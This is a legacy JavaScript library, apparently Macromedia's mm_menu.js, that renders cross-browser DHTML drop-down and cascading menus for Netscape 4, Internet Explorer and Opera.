
function Menu(label, mw, mh, fnt, fs, fclr, fhclr, bg, bgh, halgn, valgn, pad, space, to, sx, sy, srel, opq, vert, idt, aw, ah) 
{
	this.version = "020320 [Menu; mm_menu.js]";
	this.type = "Menu";
	this.menuWidth = mw;
	this.menuItemHeight = mh;
	this.fontSize = fs;
	this.fontWeight = "plain";
	this.fontFamily = fnt;
	this.fontColor = fclr;
	this.fontColorHilite = fhclr;
	this.bgColor = "#555555";
	this.menuBorder = 1;
	this.menuBgOpaque=opq;
	this.menuItemBorder = 1;
	this.menuItemIndent = idt;
	this.menuItemBgColor = bg;
	this.menuItemVAlign = valgn;
	this.menuItemHAlign = halgn;
	this.menuItemPadding = pad;
	this.menuItemSpacing = space;
	this.menuLiteBgColor = "#ffffff";
	this.menuBorderBgColor = "#777777";
	this.menuHiliteBgColor = bgh;
	this.menuContainerBgColor = "#cccccc";
	this.childMenuIcon = "arrows.gif";
	this.submenuXOffset = sx;
	this.submenuYOffset = sy;
	this.submenuRelativeToItem = srel;
	this.vertical = vert;
	this.items = new Array();
	this.actions = new Array();
	this.childMenus = new Array();
	this.hideOnMouseOut = true;
	this.hideTimeout = to;
	this.addMenuItem = addMenuItem;
	this.writeMenus = writeMenus;
	this.MM_showMenu = MM_showMenu;
	this.onMenuItemOver = onMenuItemOver;
	this.onMenuItemAction = onMenuItemAction;
	this.hideMenu = hideMenu;
	this.hideChildMenu = hideChildMenu;
	if (!window.menus) window.menus = new Array();
	this.label = " " + label;
	window.menus[this.label] = this;
	window.menus[window.menus.length] = this;
	if (!window.activeMenus) window.activeMenus = new Array();
}

function addMenuItem(label, action) {
	this.items[this.items.length] = label;
	this.actions[this.actions.length] = action;
}

function FIND(item) {
	if( window.mmIsOpera ) return(document.getElementById(item));
	if (document.all) return(document.all[item]);
	if (document.getElementById) return(document.getElementById(item));
	return(false);
}

function writeMenus(container) {
	if (window.triedToWriteMenus) return;
	var agt = navigator.userAgent.toLowerCase();
	window.mmIsOpera = agt.indexOf("opera") != -1;
	if (!container && document.layers) {
		window.delayWriteMenus = this.writeMenus;
		var timer = setTimeout('delayWriteMenus()', 500);
		container = new Layer(100);
		clearTimeout(timer);
	} else if (document.all || document.hasChildNodes || window.mmIsOpera) {
		document.writeln('<span id="menuContainer"></span>');
		container = FIND("menuContainer");
	}

	window.mmHideMenuTimer = null;
	if (!container) return;	
	window.triedToWriteMenus = true; 
	container.isContainer = true;
	container.menus = new Array();
	for (var i=0; i<window.menus.length; i++) 
		container.menus[i] = window.menus[i];
	window.menus.length = 0;
	var countMenus = 0;
	var countItems = 0;
	var top = 0;
	var content = '';
	var lrs = false;
	var theStat = "";
	var tsc = 0;
	if (document.layers) lrs = true;
	for (var i=0; i<container.menus.length; i++, countMenus++) {
		var menu = container.menus[i];
		if (menu.bgImageUp || !menu.menuBgOpaque) {
			menu.menuBorder = 0;
			menu.menuItemBorder = 0;
		}
		if (lrs) {
			var menuLayer = new Layer(100, container);
			var lite = new Layer(100, menuLayer);
			lite.top = menu.menuBorder;
			lite.left = menu.menuBorder;
			var body = new Layer(100, lite);
			body.top = menu.menuBorder;
			body.left = menu.menuBorder;
		} else {
			content += ''+
			'<div id="menuLayer'+ countMenus +'" style="position:absolute;z-index:1;left:10px;top:'+ (i * 100) +'px;visibility:hidden;color:' +  menu.menuBorderBgColor + ';">\n'+
			'  <div id="menuLite'+ countMenus +'" style="position:absolute;z-index:1;left:'+ menu.menuBorder +'px;top:'+ menu.menuBorder +'px;visibility:hide;" onmouseout="mouseoutMenu();">\n'+
			'	 <div id="menuFg'+ countMenus +'" style="position:absolute;left:'+ menu.menuBorder +'px;top:'+ menu.menuBorder +'px;visibility:hide;">\n'+
			'';
		}
		var x=i;
		for (var i=0; i<menu.items.length; i++) {
			var item = menu.items[i];
			var childMenu = false;
			var defaultHeight = menu.fontSize+2*menu.menuItemPadding;
			if (item.label) {
				item = item.label;
				childMenu = true;
			}
			menu.menuItemHeight = menu.menuItemHeight || defaultHeight;
			var itemProps = '';
			if( menu.fontFamily != '' ) itemProps += 'font-family:' + menu.fontFamily +';';
			itemProps += 'font-weight:' + menu.fontWeight + ';fontSize:' + menu.fontSize + 'px;';
			if (menu.fontStyle) itemProps += 'font-style:' + menu.fontStyle + ';';
			if (document.all || window.mmIsOpera) 
				itemProps += 'font-size:' + menu.fontSize + 'px;" onmouseover="onMenuItemOver(null,this);" onclick="onMenuItemAction(null,this);';
			else if (!document.layers) {
				itemProps += 'font-size:' + menu.fontSize + 'px;';
			}
			var l;
			if (lrs) {
				var lw = menu.menuWidth;
				if( menu.menuItemHAlign == 'right' ) lw -= menu.menuItemPadding;
				l = new Layer(lw,body);
			}
			var itemLeft = 0;
			var itemTop = i*menu.menuItemHeight;
			if( !menu.vertical ) {
				itemLeft = i*menu.menuWidth;
				itemTop = 0;
			}
			var dTag = '<div id="menuItem'+ countItems +'" style="position:absolute;left:' + itemLeft + 'px;top:'+ itemTop +'px;'+ itemProps +'">';
			var dClose = '</div>'
			if (menu.bgImageUp) dTag = '<div id="menuItem'+ countItems +'" style="background:url('+menu.bgImageUp+');position:absolute;left:' + itemLeft + 'px;top:'+ itemTop +'px;'+ itemProps +'">';

			var left = 0, top = 0, right = 0, bottom = 0;
			left = 1 + menu.menuItemPadding + menu.menuItemIndent;
			right = left + menu.menuWidth - 2*menu.menuItemPadding - menu.menuItemIndent;
			if( menu.menuItemVAlign == 'top' ) top = menu.menuItemPadding;
			if( menu.menuItemVAlign == 'bottom' ) top = menu.menuItemHeight-menu.fontSize-1-menu.menuItemPadding;
			if( menu.menuItemVAlign == 'middle' ) top = ((menu.menuItemHeight/2)-(menu.fontSize/2)-1);
			bottom = menu.menuItemHeight - 2*menu.menuItemPadding;
			var textProps = 'position:absolute;left:' + left + 'px;top:' + top + 'px;';
			if (lrs) {
				textProps +=itemProps + 'right:' + right + ';bottom:' + bottom + ';';
				dTag = "";
				dClose = "";
			}
			
			if(document.all && !window.mmIsOpera) {
				item = '<div align="' + menu.menuItemHAlign + '">' + item + '</div>';
			} else if (lrs) {
				item = '<div style="text-align:' + menu.menuItemHAlign + ';">' + item + '</div>';
			} else {
				var hitem = null;
				if( menu.menuItemHAlign != 'left' ) {
					if(window.mmIsOpera) {
						var operaWidth = menu.menuItemHAlign == 'center' ? -(menu.menuWidth-2*menu.menuItemPadding) : (menu.menuWidth-6*menu.menuItemPadding);
						hitem = '<div id="menuItemHilite' + countItems + 'Shim" style="position:absolute;top:1px;left:' + menu.menuItemPadding + 'px;width:' + operaWidth + 'px;text-align:' 
							+ menu.menuItemHAlign + ';visibility:visible;">' + item + '</div>';
						item = '<div id="menuItemText' + countItems + 'Shim" style="position:absolute;top:1px;left:' + menu.menuItemPadding + 'px;width:' + operaWidth + 'px;text-align:' 
							+ menu.menuItemHAlign + ';visibility:visible;">' + item + '</div>';
					} else {
						hitem = '<div id="menuItemHilite' + countItems + 'Shim" style="position:absolute;top:1px;left:1px;right:-' + (left+menu.menuWidth-3*menu.menuItemPadding) + 'px;text-align:' 
							+ menu.menuItemHAlign + ';visibility:visible;">' + item + '</div>';
						item = '<div id="menuItemText' + countItems + 'Shim" style="position:absolute;top:1px;left:1px;right:-' + (left+menu.menuWidth-3*menu.menuItemPadding) + 'px;text-align:' 
							+ menu.menuItemHAlign + ';visibility:visible;">' + item + '</div>';
					}
				} else hitem = null;
			}
			if(document.all && !window.mmIsOpera) item = '<div id="menuItemShim' + countItems + '" style="position:absolute;left:0px;top:0px;">' + item + '</div>';
			var dText	= '<div id="menuItemText'+ countItems +'" style="' + textProps + 'color:'+ menu.fontColor +';">'+ item +'&nbsp</div>\n'
						+ '<div id="menuItemHilite'+ countItems +'" style="' + textProps + 'color:'+ menu.fontColorHilite +';visibility:hidden;">' 
						+ (hitem||item) +'&nbsp</div>';
			if (childMenu) content += ( dTag + dText + '<div id="childMenu'+ countItems +'" style="position:absolute;left:0px;top:3px;"><img src="'+ menu.childMenuIcon +'"></div>\n' + dClose);
			else content += ( dTag + dText + dClose);
			if (lrs) {
				l.document.open("text/html");
				l.document.writeln(content);
				l.document.close();	
				content = '';
				theStat += "-";
				tsc++;
				if (tsc > 50) {
					tsc = 0;
					theStat = "";
				}
				status = theStat;
			}
			countItems++;  
		}
		if (lrs) {
			var focusItem = new Layer(100, body);
			focusItem.visiblity="hidden";
			focusItem.document.open("text/html");
			focusItem.document.writeln("&nbsp;");
			focusItem.document.close();	
		} else {
		  content += '	  <div id="focusItem'+ countMenus +'" style="position:absolute;left:0px;top:0px;visibility:hide;" onclick="onMenuItemAction(null,this);">&nbsp;</div>\n';
		  content += '   </div>\n  </div>\n</div>\n';
		}
		i=x;
	}
	if (document.layers) {		
		container.clip.width = window.innerWidth;
		container.clip.height = window.innerHeight;
		container.onmouseout = mouseoutMenu;
		container.menuContainerBgColor = this.menuContainerBgColor;
		for (var i=0; i<container.document.layers.length; i++) {
			proto = container.menus[i];
			var menu = container.document.layers[i];
			container.menus[i].menuLayer = menu;
			container.menus[i].menuLayer.Menu = container.menus[i];
			container.menus[i].menuLayer.Menu.container = container;
			var body = menu.document.layers[0].document.layers[0];
			body.clip.width = proto.menuWidth || body.clip.width;
			body.clip.height = proto.menuHeight || body.clip.height;
			for (var n=0; n<body.document.layers.length-1; n++) {
				var l = body.document.layers[n];
				l.Menu = container.menus[i];
				l.menuHiliteBgColor = proto.menuHiliteBgColor;
				l.document.bgColor = proto.menuItemBgColor;
				l.saveColor = proto.menuItemBgColor;
				l.onmouseover = proto.onMenuItemOver;
				l.onclick = proto.onMenuItemAction;
				l.mmaction = container.menus[i].actions[n];
				l.focusItem = body.document.layers[body.document.layers.length-1];
				l.clip.width = proto.menuWidth || body.clip.width;
				l.clip.height = proto.menuItemHeight || l.clip.height;
				if (n>0) {
					if( l.Menu.vertical ) l.top = body.document.layers[n-1].top + body.document.layers[n-1].clip.height + proto.menuItemBorder + proto.menuItemSpacing;
					else l.left = body.document.layers[n-1].left + body.document.layers[n-1].clip.width + proto.menuItemBorder + proto.menuItemSpacing;
				}
				l.hilite = l.document.layers[1];
				if (proto.bgImageUp) l.background.src = proto.bgImageUp;
				l.document.layers[1].isHilite = true;
				if (l.document.layers.length > 2) {
					l.childMenu = container.menus[i].items[n].menuLayer;
					l.document.layers[2].left = l.clip.width -13;
					l.document.layers[2].top = (l.clip.height / 2) -4;
					l.document.layers[2].clip.left += 3;
					l.Menu.childMenus[l.Menu.childMenus.length] = l.childMenu;
				}
			}
			if( proto.menuBgOpaque ) body.document.bgColor = proto.bgColor;
			if( proto.vertical ) {
				body.clip.width  = l.clip.width +proto.menuBorder;
				body.clip.height = l.top + l.clip.height +proto.menuBorder;
			} else {
				body.clip.height  = l.clip.height +proto.menuBorder;
				body.clip.width = l.left + l.clip.width  +proto.menuBorder;
				if( body.clip.width > window.innerWidth ) body.clip.width = window.innerWidth;
			}
			var focusItem = body.document.layers[n];
			focusItem.clip.width = body.clip.width;
			focusItem.Menu = l.Menu;
			focusItem.top = -30;
            focusItem.captureEvents(Event.MOUSEDOWN);
            focusItem.onmousedown = onMenuItemDown;
			if( proto.menuBgOpaque ) menu.document.bgColor = proto.menuBorderBgColor;
			var lite = menu.document.layers[0];
			if( proto.menuBgOpaque ) lite.document.bgColor = proto.menuLiteBgColor;
			lite.clip.width = body.clip.width +1;
			lite.clip.height = body.clip.height +1;
			menu.clip.width = body.clip.width + (proto.menuBorder * 3) ;
			menu.clip.height = body.clip.height + (proto.menuBorder * 3);
		}
	} else {
		if ((!document.all) && (container.hasChildNodes) && !window.mmIsOpera) {
			container.innerHTML=content;
		} else {
			container.document.open("text/html");
			container.document.writeln(content);
			container.document.close();	
		}
		if (!FIND("menuLayer0")) return;
		var menuCount = 0;
		for (var x=0; x<container.menus.length; x++) {
			var menuLayer = FIND("menuLayer" + x);
			container.menus[x].menuLayer = "menuLayer" + x;
			menuLayer.Menu = container.menus[x];
			menuLayer.Menu.container = "menuLayer" + x;
			menuLayer.style.zindex = 1;
		    var s = menuLayer.style;
			s.pixeltop = -300;
			s.pixelleft = -300;
			s.top = '-300px';
			s.left = '-300px';

			var menu = container.menus[x];
			menu.menuItemWidth = menu.menuWidth || menu.menuIEWidth || 140;
			if( menu.menuBgOpaque ) menuLayer.style.backgroundColor = menu.menuBorderBgColor;
			var top = 0;
			var left = 0;
			menu.menuItemLayers = new Array();
			for (var i=0; i<container.menus[x].items.length; i++) {
				var l = FIND("menuItem" + menuCount);
				l.Menu = container.menus[x];
				l.Menu.menuItemLayers[l.Menu.menuItemLayers.length] = l;
				if (l.addEventListener || window.mmIsOpera) {
					l.style.width = menu.menuItemWidth + 'px';
					l.style.height = menu.menuItemHeight + 'px';
					l.style.pixelWidth = menu.menuItemWidth;
					l.style.pixelHeight = menu.menuItemHeight;
					l.style.top = top + 'px';
					l.style.left = left + 'px';
					if(l.addEventListener) {
						l.addEventListener("mouseover", onMenuItemOver, false);
						l.addEventListener("click", onMenuItemAction, false);
						l.addEventListener("mouseout", mouseoutMenu, false);
					}
					if( menu.menuItemHAlign != 'left' ) {
						l.hiliteShim = FIND("menuItemHilite" + menuCount + "Shim");
						l.hiliteShim.style.visibility = "inherit";
						l.textShim = FIND("menuItemText" + menuCount + "Shim");
						l.hiliteShim.style.pixelWidth = menu.menuItemWidth - 2*menu.menuItemPadding - menu.menuItemIndent;
						l.hiliteShim.style.width = l.hiliteShim.style.pixelWidth;
						l.textShim.style.pixelWidth = menu.menuItemWidth - 2*menu.menuItemPadding - menu.menuItemIndent;
						l.textShim.style.width = l.textShim.style.pixelWidth;	
					}
				} else {
					l.style.pixelWidth = menu.menuItemWidth;
					l.style.pixelHeight = menu.menuItemHeight;
					l.style.pixelTop = top;
					l.style.pixelLeft = left;
					if( menu.menuItemHAlign != 'left' ) {
						var shim = FIND("menuItemShim" + menuCount);
						shim[0].style.pixelWidth = menu.menuItemWidth - 2*menu.menuItemPadding - menu.menuItemIndent;
						shim[1].style.pixelWidth = menu.menuItemWidth - 2*menu.menuItemPadding - menu.menuItemIndent;
						shim[0].style.width = shim[0].style.pixelWidth + 'px';
						shim[1].style.width = shim[1].style.pixelWidth + 'px';
					}
				}
				if( menu.vertical ) top = top + menu.menuItemHeight+menu.menuItemBorder+menu.menuItemSpacing;
				else left = left + menu.menuItemWidth+menu.menuItemBorder+menu.menuItemSpacing;
				l.style.fontSize = menu.fontSize + 'px';
				l.style.backgroundColor = menu.menuItemBgColor;
				l.style.visibility = "inherit";
				l.saveColor = menu.menuItemBgColor;
				l.menuHiliteBgColor = menu.menuHiliteBgColor;
				l.mmaction = container.menus[x].actions[i];
				l.hilite = FIND("menuItemHilite" + menuCount);
				l.focusItem = FIND("focusItem" + x);
				l.focusItem.style.pixelTop = -30;
				l.focusItem.style.top = '-30px';
				var childItem = FIND("childMenu" + menuCount);
				if (childItem) {
					l.childMenu = container.menus[x].items[i].menuLayer;
					childItem.style.pixelLeft = menu.menuItemWidth -11;
					childItem.style.left = childItem.style.pixelLeft + 'px';
					childItem.style.pixelTop = (menu.menuItemHeight /2) -4;
					childItem.style.top = childItem.style.pixelTop + 'px';
					l.Menu.childMenus[l.Menu.childMenus.length] = l.childMenu;
				}
				l.style.cursor = "hand";
				menuCount++;
			}
			if( menu.vertical ) {
				menu.menuHeight = top-1-menu.menuItemSpacing;
				menu.menuWidth = menu.menuItemWidth;
			} else {
				menu.menuHeight = menu.menuItemHeight;
				menu.menuWidth = left-1-menu.menuItemSpacing;
			}

			var lite = FIND("menuLite" + x);
			var s = lite.style;
			s.pixelHeight = menu.menuHeight +(menu.menuBorder * 2);
			s.height = s.pixelHeight + 'px';
			s.pixelWidth = menu.menuWidth + (menu.menuBorder * 2);
			s.width = s.pixelWidth + 'px';
			if( menu.menuBgOpaque ) s.backgroundColor = menu.menuLiteBgColor;

			var body = FIND("menuFg" + x);
			s = body.style;
			s.pixelHeight = menu.menuHeight + menu.menuBorder;
			s.height = s.pixelHeight + 'px';
			s.pixelWidth = menu.menuWidth + menu.menuBorder;
			s.width = s.pixelWidth + 'px';
			if( menu.menuBgOpaque ) s.backgroundColor = menu.bgColor;

			s = menuLayer.style;
			s.pixelWidth  = menu.menuWidth + (menu.menuBorder * 4);
			s.width = s.pixelWidth + 'px';
			s.pixelHeight  = menu.menuHeight+(menu.menuBorder*4);
			s.height = s.pixelHeight + 'px';
		}
	}
	if (document.captureEvents) document.captureEvents(Event.MOUSEUP);
	if (document.addEventListener) document.addEventListener("mouseup", onMenuItemOver, false);
	if (document.layers && window.innerWidth) {
		window.onresize = NS4resize;
		window.NS4sIW = window.innerWidth;
		window.NS4sIH = window.innerHeight;
		setTimeout("NS4resize()",500);
	}
	document.onmouseup = mouseupMenu;
	window.mmWroteMenu = true;
	status = "";
}

function NS4resize() {
	if (NS4sIW != window.innerWidth || NS4sIH != window.innerHeight) window.location.reload();
}

function onMenuItemOver(e, l) {
	MM_clearTimeout();
	l = l || this;
	a = window.ActiveMenuItem;
	if (document.layers) {
		if (a) {
			a.document.bgColor = a.saveColor;
			if (a.hilite) a.hilite.visibility = "hidden";
			if (a.Menu.bgImageOver) a.background.src = a.Menu.bgImageUp;
			a.focusItem.top = -100;
			a.clicked = false;
		}
		if (l.hilite) {
			l.document.bgColor = l.menuHiliteBgColor;
			l.zIndex = 1;
			l.hilite.visibility = "inherit";
			l.hilite.zIndex = 2;
			l.document.layers[1].zIndex = 1;
			l.focusItem.zIndex = this.zIndex +2;
		}
		if (l.Menu.bgImageOver) l.background.src = l.Menu.bgImageOver;
		l.focusItem.top = this.top;
		l.focusItem.left = this.left;
		l.focusItem.clip.width = l.clip.width;
		l.focusItem.clip.height = l.clip.height;
		l.Menu.hideChildMenu(l);
	} else if (l.style && l.Menu) {
		if (a) {
			a.style.backgroundColor = a.saveColor;
			if (a.hilite) a.hilite.style.visibility = "hidden";
			if (a.hiliteShim) a.hiliteShim.style.visibility = "inherit";
			if (a.Menu.bgImageUp) a.style.background = "url(" + a.Menu.bgImageUp +")";;
		} 
		l.style.backgroundColor = l.menuHiliteBgColor;
		l.zIndex = 1;
		if (l.Menu.bgImageOver) l.style.background = "url(" + l.Menu.bgImageOver +")";
		if (l.hilite) {
			l.hilite.style.visibility = "inherit";
			if( l.hiliteShim ) l.hiliteShim.style.visibility = "visible";
		}
		l.focusItem.style.pixelTop = l.style.pixelTop;
		l.focusItem.style.top = l.focusItem.style.pixelTop + 'px';
		l.focusItem.style.pixelLeft = l.style.pixelLeft;
		l.focusItem.style.left = l.focusItem.style.pixelLeft + 'px';
		l.focusItem.style.zIndex = l.zIndex +1;
		l.Menu.hideChildMenu(l);
	} else return;
	window.ActiveMenuItem = l;
}

function onMenuItemAction(e, l) {
	l = window.ActiveMenuItem;
	if (!l) return;
	hideActiveMenus();
	if (l.mmaction) eval("" + l.mmaction);
	window.ActiveMenuItem = 0;
}

function MM_clearTimeout() {
	if (mmHideMenuTimer) clearTimeout(mmHideMenuTimer);
	mmHideMenuTimer = null;
	mmDHFlag = false;
}

function MM_startTimeout() {
	if( window.ActiveMenu ) {
		mmStart = new Date();
		mmDHFlag = true;
		mmHideMenuTimer = setTimeout("mmDoHide()", window.ActiveMenu.Menu.hideTimeout);
	}
}

function mmDoHide() {
	if (!mmDHFlag || !window.ActiveMenu) return;
	var elapsed = new Date() - mmStart;
	var timeout = window.ActiveMenu.Menu.hideTimeout;
	if (elapsed < timeout) {
		mmHideMenuTimer = setTimeout("mmDoHide()", timeout+100-elapsed);
		return;
	}
	mmDHFlag = false;
	hideActiveMenus();
	window.ActiveMenuItem = 0;
}

function MM_showMenu(menu, x, y, child, imgname) {
	if (!window.mmWroteMenu) return;
	MM_clearTimeout();
	if (menu) {
		var obj = FIND(imgname) || document.images[imgname] || document.links[imgname] || document.anchors[imgname];
		x = moveXbySlicePos (x, obj);
		y = moveYbySlicePos (y, obj);
	}
	if (document.layers) {
		if (menu) {
			var l = menu.menuLayer || menu;
			l.top = l.left = 1;
			hideActiveMenus();
			if (this.visibility) l = this;
			window.ActiveMenu = l;
		} else {
			var l = child;
		}
		if (!l) return;
		for (var i=0; i<l.layers.length; i++) { 			   
			if (!l.layers[i].isHilite) l.layers[i].visibility = "inherit";
			if (l.layers[i].document.layers.length > 0) MM_showMenu(null, "relative", "relative", l.layers[i]);
		}
		if (l.parentLayer) {
			if (x != "relative") l.parentLayer.left = x || window.pageX || 0;
			if (l.parentLayer.left + l.clip.width > window.innerWidth) l.parentLayer.left -= (l.parentLayer.left + l.clip.width - window.innerWidth);
			if (y != "relative") l.parentLayer.top = y || window.pageY || 0;
			if (l.parentLayer.isContainer) {
				l.Menu.xOffset = window.pageXOffset;
				l.Menu.yOffset = window.pageYOffset;
				l.parentLayer.clip.width = window.ActiveMenu.clip.width +2;
				l.parentLayer.clip.height = window.ActiveMenu.clip.height +2;
				if (l.parentLayer.menuContainerBgColor && l.Menu.menuBgOpaque ) l.parentLayer.document.bgColor = l.parentLayer.menuContainerBgColor;
			}
		}
		l.visibility = "inherit";
		if (l.Menu) l.Menu.container.visibility = "inherit";
	} else if (FIND("menuItem0")) {
		var l = menu.menuLayer || menu;	
		hideActiveMenus();
		if (typeof(l) == "string") l = FIND(l);
		window.ActiveMenu = l;
		var s = l.style;
		s.visibility = "inherit";
		if (x != "relative") {
			s.pixelLeft = x || (window.pageX + document.body.scrollLeft) || 0;
			s.left = s.pixelLeft + 'px';
		}
		if (y != "relative") {
			s.pixelTop = y || (window.pageY + document.body.scrollTop) || 0;
			s.top = s.pixelTop + 'px';
		}
		l.Menu.xOffset = document.body.scrollLeft;
		l.Menu.yOffset = document.body.scrollTop;
	}
	if (menu) window.activeMenus[window.activeMenus.length] = l;
	MM_clearTimeout();
}

function onMenuItemDown(e, l) {
	var a = window.ActiveMenuItem;
	if (document.layers && a) {
		a.eX = e.pageX;
		a.eY = e.pageY;
		a.clicked = true;
    }
}

function mouseupMenu(e) {
	hideMenu(true, e);
	hideActiveMenus();
	return true;
}

function getExplorerVersion() {
	var ieVers = parseFloat(navigator.appVersion);
	if( navigator.appName != 'Microsoft Internet Explorer' ) return ieVers;
	var tempVers = navigator.appVersion;
	var i = tempVers.indexOf( 'MSIE ' );
	if( i >= 0 ) {
		tempVers = tempVers.substring( i+5 );
		ieVers = parseFloat( tempVers ); 
	}
	return ieVers;
}

function mouseoutMenu() {
	if ((navigator.appName == "Microsoft Internet Explorer") && (getExplorerVersion() < 4.5))
		return true;
	hideMenu(false, false);
	return true;
}

function hideMenu(mouseup, e) {
	var a = window.ActiveMenuItem;
	if (a && document.layers) {
		a.document.bgColor = a.saveColor;
		a.focusItem.top = -30;
		if (a.hilite) a.hilite.visibility = "hidden";
		if (mouseup && a.mmaction && a.clicked && window.ActiveMenu) {
 			if (a.eX <= e.pageX+15 && a.eX >= e.pageX-15 && a.eY <= e.pageY+10 && a.eY >= e.pageY-10) {
				setTimeout('window.ActiveMenu.Menu.onMenuItemAction();', 500);
			}
		}
		a.clicked = false;
		if (a.Menu.bgImageOver) a.background.src = a.Menu.bgImageUp;
	} else if (window.ActiveMenu && FIND("menuItem0")) {
		if (a) {
			a.style.backgroundColor = a.saveColor;
			if (a.hilite) a.hilite.style.visibility = "hidden";
			if (a.hiliteShim) a.hiliteShim.style.visibility = "inherit";
			if (a.Menu.bgImageUp) a.style.background = "url(" + a.Menu.bgImageUp +")";
		}
	}
	if (!mouseup && window.ActiveMenu) {
		if (window.ActiveMenu.Menu) {
			if (window.ActiveMenu.Menu.hideOnMouseOut) MM_startTimeout();
			return(true);
		}
	}
	return(true);
}

function hideChildMenu(hcmLayer) {
	MM_clearTimeout();
	var l = hcmLayer;
	for (var i=0; i < l.Menu.childMenus.length; i++) {
		var theLayer = l.Menu.childMenus[i];
		if (document.layers) theLayer.visibility = "hidden";
		else {
			theLayer = FIND(theLayer);
			theLayer.style.visibility = "hidden";
			if( theLayer.Menu.menuItemHAlign != 'left' ) {
				for(var j = 0; j < theLayer.Menu.menuItemLayers.length; j++) {
					var itemLayer = theLayer.Menu.menuItemLayers[j];
					if(itemLayer.textShim) itemLayer.textShim.style.visibility = "inherit";
				}
			}
		}
		theLayer.Menu.hideChildMenu(theLayer);
	}
	if (l.childMenu) {
		var childMenu = l.childMenu;
		if (document.layers) {
			l.Menu.MM_showMenu(null,null,null,childMenu.layers[0]);
			childMenu.zIndex = l.parentLayer.zIndex +1;
			childMenu.top = l.Menu.menuLayer.top + l.Menu.submenuYOffset;
			if( l.Menu.vertical ) {
				if( l.Menu.submenuRelativeToItem ) childMenu.top += l.top + l.parentLayer.top;
				childMenu.left = l.parentLayer.left + l.parentLayer.clip.width - (2*l.Menu.menuBorder) + l.Menu.menuLayer.left + l.Menu.submenuXOffset;
			} else {
				childMenu.top += l.top + l.parentLayer.top;	
				if( l.Menu.submenuRelativeToItem ) childMenu.left = l.Menu.menuLayer.left + l.left + l.clip.width + (2*l.Menu.menuBorder) + l.Menu.submenuXOffset;
				else childMenu.left = l.parentLayer.left + l.parentLayer.clip.width - (2*l.Menu.menuBorder) + l.Menu.menuLayer.left + l.Menu.submenuXOffset;
			}
			if( childMenu.left < l.Menu.container.clip.left ) l.Menu.container.clip.left = childMenu.left;
			var w = childMenu.clip.width+childMenu.left-l.Menu.container.clip.left;
			if (w > l.Menu.container.clip.width)  l.Menu.container.clip.width = w;
			var h = childMenu.clip.height+childMenu.top-l.Menu.container.clip.top;
			if (h > l.Menu.container.clip.height) l.Menu.container.clip.height = h;
			l.document.layers[1].zIndex = 0;
			childMenu.visibility = "inherit";
		} else if (FIND("menuItem0")) {
			childMenu = FIND(l.childMenu);
			var menuLayer = FIND(l.Menu.menuLayer);
			var s = childMenu.style;
			s.zIndex = menuLayer.style.zIndex+1;
			if (document.all || window.mmIsOpera) {
				s.pixelTop = menuLayer.style.pixelTop + l.Menu.submenuYOffset;
				if( l.Menu.vertical ) {
					if( l.Menu.submenuRelativeToItem ) s.pixelTop += l.style.pixelTop;
					s.pixelLeft = l.style.pixelWidth + menuLayer.style.pixelLeft + l.Menu.submenuXOffset;
					s.left = s.pixelLeft + 'px';
				} else {
					s.pixelTop += l.style.pixelTop;
					if( l.Menu.submenuRelativeToItem ) s.pixelLeft = menuLayer.style.pixelLeft + l.style.pixelLeft + l.style.pixelWidth + (2*l.Menu.menuBorder) + l.Menu.submenuXOffset;
					else s.pixelLeft = (menuLayer.style.pixelWidth-4*l.Menu.menuBorder) + menuLayer.style.pixelLeft + l.Menu.submenuXOffset;
					s.left = s.pixelLeft + 'px';
				}
			} else {
				var top = parseInt(menuLayer.style.top) + l.Menu.submenuYOffset;
				var left = 0;
				if( l.Menu.vertical ) {
					if( l.Menu.submenuRelativeToItem ) top += parseInt(l.style.top);
					left = (parseInt(menuLayer.style.width)-4*l.Menu.menuBorder) + parseInt(menuLayer.style.left) + l.Menu.submenuXOffset;
				} else {
					top += parseInt(l.style.top);
					if( l.Menu.submenuRelativeToItem ) left = parseInt(menuLayer.style.left) + parseInt(l.style.left) + parseInt(l.style.width) + (2*l.Menu.menuBorder) + l.Menu.submenuXOffset;
					else left = (parseInt(menuLayer.style.width)-4*l.Menu.menuBorder) + parseInt(menuLayer.style.left) + l.Menu.submenuXOffset;
				}
				s.top = top + 'px';
				s.left = left + 'px';
			}
			childMenu.style.visibility = "inherit";
		} else return;
		window.activeMenus[window.activeMenus.length] = childMenu;
	}
}

function hideActiveMenus() {
	if (!window.activeMenus) return;
	for (var i=0; i < window.activeMenus.length; i++) {
		if (!activeMenus[i]) continue;
		if (activeMenus[i].visibility && activeMenus[i].Menu && !window.mmIsOpera) {
			activeMenus[i].visibility = "hidden";
			activeMenus[i].Menu.container.visibility = "hidden";
			activeMenus[i].Menu.container.clip.left = 0;
		} else if (activeMenus[i].style) {
			var s = activeMenus[i].style;
			s.visibility = "hidden";
			s.left = '-200px';
			s.top = '-200px';
		}
	}
	if (window.ActiveMenuItem) hideMenu(false, false);
	window.activeMenus.length = 0;
}

function moveXbySlicePos (x, img) { 
	if (!document.layers) {
		var onWindows = navigator.platform ? navigator.platform == "Win32" : false;
		var macIE45 = document.all && !onWindows && getExplorerVersion() == 4.5;
		var par = img;
		var lastOffset = 0;
		while(par){
			if( par.leftMargin && ! onWindows ) x += parseInt(par.leftMargin);
			if( (par.offsetLeft != lastOffset) && par.offsetLeft ) x += parseInt(par.offsetLeft);
			if( par.offsetLeft != 0 ) lastOffset = par.offsetLeft;
			par = macIE45 ? par.parentElement : par.offsetParent;
		}
	} else if (img.x) x += img.x;
	return x;
}

function moveYbySlicePos (y, img) {
	if(!document.layers) {
		var onWindows = navigator.platform ? navigator.platform == "Win32" : false;
		var macIE45 = document.all && !onWindows && getExplorerVersion() == 4.5;
		var par = img;
		var lastOffset = 0;
		while(par){
			if( par.topMargin && !onWindows ) y += parseInt(par.topMargin);
			if( (par.offsetTop != lastOffset) && par.offsetTop ) y += parseInt(par.offsetTop);
			if( par.offsetTop != 0 ) lastOffset = par.offsetTop;
			par = macIE45 ? par.parentElement : par.offsetParent;
		}		
	} else if (img.y >= 0) y += img.y;
	return y;
}








